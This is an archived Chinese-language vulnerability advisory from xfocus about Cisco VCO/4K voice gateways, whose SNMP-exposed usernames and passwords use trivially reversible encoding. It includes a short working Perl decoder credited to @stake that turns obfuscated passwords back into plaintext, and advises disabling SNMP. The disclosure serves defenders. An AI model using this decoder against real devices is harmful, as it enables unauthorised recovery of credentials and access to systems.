xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Cisco CVCO/4k 远程用户名和密码可被发现


发布时间:2000-11-03
更新时间:2000-11-03
严重程度:
威胁程度:远程非授权文件存取
错误类型:设计错误
利用方式:服务器模式

受影响系统
Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 和早期版本
不影响系统:Cisco Virtual Central Office 4000 (VCO/4K) 5.1.4
详细描述
Cisco Virtual Central Office 4000 (VCO/4K)可编程语音网关发现有
漏洞存在,用户名和密码通过设备的SNMP管理接口来保护,但其使用简单的
加密方法,很容易被破解,所以,如果加密的密码被获得,如通过READ-ONLY的
COMMUNITY STRING,可以导致攻击者获得合法用户名和密码的列表。

测试代码
<--- cut here --->
#!/usr/bin/perl

printf ("Cisco VCO/4K Password [De]Obfuscator\n");
printf ("\t\@stake, Inc.\n");
printf ("\tRex Warren, Brian Carrier, David Goldsmith\n");

printf ("Enter Password: ");
$pw = <STDIN>;
chop $pw;

printf("Result: ");
for ($pos = 0; $pos < length($pw); $pos++){
printf("%s", chr(164 - ord(substr($pw, $pos, 1))));
}
printf("\n");

<--- cut here --->

解决方案
如果SNMP不需要,关闭这个服务。

相关信息
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved